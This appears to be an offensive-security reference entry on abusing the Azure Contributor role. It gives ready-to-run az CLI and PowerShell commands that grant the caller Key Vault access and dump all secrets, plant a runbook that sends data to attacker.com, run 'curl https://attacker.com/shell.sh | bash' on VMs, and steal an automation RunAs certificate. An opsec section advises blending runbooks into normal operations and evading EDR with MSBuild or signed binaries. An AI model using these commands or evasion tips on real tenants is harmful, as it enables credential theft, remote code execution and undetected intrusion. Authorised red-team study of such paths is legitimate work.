AZContributor
The source principal has the Contributor role on the target Azure resource, enabling full resource management (read, write, delete) but not the ability to assign roles.
Applies to: User / ServicePrincipal β AZSubscription / AZResourceGroup / AZKeyVault / AZAutomationAccount / AZVM / AZResource
Linux Abuse
Key Vault β grant self access policy and dump secrets
az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
# Grant yourself secret read on the vault
az keyvault set-policy --name <vault-name> \
--object-id <object-id> \
--secret-permissions get list
# List and retrieve secrets
az keyvault secret list --vault-name <vault-name> --query '[].id' -o tsv | \
xargs -I{} az keyvault secret show --id {} --query 'value' -o tsv
Automation Account β create malicious runbook
# Upload runbook that exfils credentials or spawns reverse shell
az automation runbook create \
--resource-group <resource-group> \
--automation-account-name <automation-account> \
--name evil-runbook \
--type PowerShell
az automation runbook replace-content \
--resource-group <resource-group> \
--automation-account-name <automation-account> \
--name evil-runbook \
--content 'Invoke-WebRequest -Uri "https://attacker.com/?d=$(whoami)"'
az automation runbook publish \
--resource-group <resource-group> \
--automation-account-name <automation-account> \
--name evil-runbook
az automation runbook start \
--resource-group <resource-group> \
--automation-account-name <automation-account> \
--name evil-runbook
VM β run command as SYSTEM/root
az vm run-command invoke \
--resource-group <resource-group> \
--name <vm-name> \
--command-id RunPowerShellScript \
--scripts "whoami; hostname; cat C:\Users\Administrator\Desktop\root.txt"
# Linux VM
az vm run-command invoke \
--resource-group <resource-group> \
--name <vm-name> \
--command-id RunShellScript \
--scripts "id; cat /root/root.txt; curl https://attacker.com/shell.sh | bash"
Windows Abuse
PowerZure β run command on VM
Connect-AzAccount -AccessToken <access-token> -AccountId <username>
Invoke-AzureRunCommand -ResourceGroup <resource-group> -VM <vm-name> -Command 'whoami'
Invoke-AzureRunMSBuild -ResourceGroup <resource-group> -VM <vm-name>
Invoke-AzureRunProgram -ResourceGroup <resource-group> -VM <vm-name> -Program 'cmd.exe' -Arguments '/c whoami'
Az PowerShell β run command on VM
Invoke-AzVMRunCommand `
-ResourceGroupName <resource-group> `
-VMName <vm-name> `
-CommandId RunPowerShellScript `
-ScriptString 'whoami; hostname'
Key Vault β dump secrets
# Grant access
Set-AzKeyVaultAccessPolicy -VaultName <vault-name> -ObjectId <object-id> -PermissionsToSecrets get,list
# Dump
Get-AzKeyVaultSecret -VaultName <vault-name> | ForEach-Object {
$secret = Get-AzKeyVaultSecret -VaultName <vault-name> -Name $_.Name -AsPlainText
Write-Output "$($_.Name) = $secret"
}
Automation Account β steal RunAs certificate
# PowerZure
Get-AzureRunAsCertificate -ResourceGroup <resource-group> -AutomationAccount <automation-account>
Opsec
- Azure Activity Log records all resource modification actions including runbook creation and execution.
- VM run-command leaves artifacts in guest OS logs (Event ID 4688 on Windows, shell history on Linux).
- Key Vault access is logged per-secret with actor and timestamp.
- Prefer runbook execution via existing scheduled runbooks to blend with normal operations.
- EDR solutions on VMs may flag
Invoke-AzVMRunCommandpayloads β use MSBuild or signed binaries.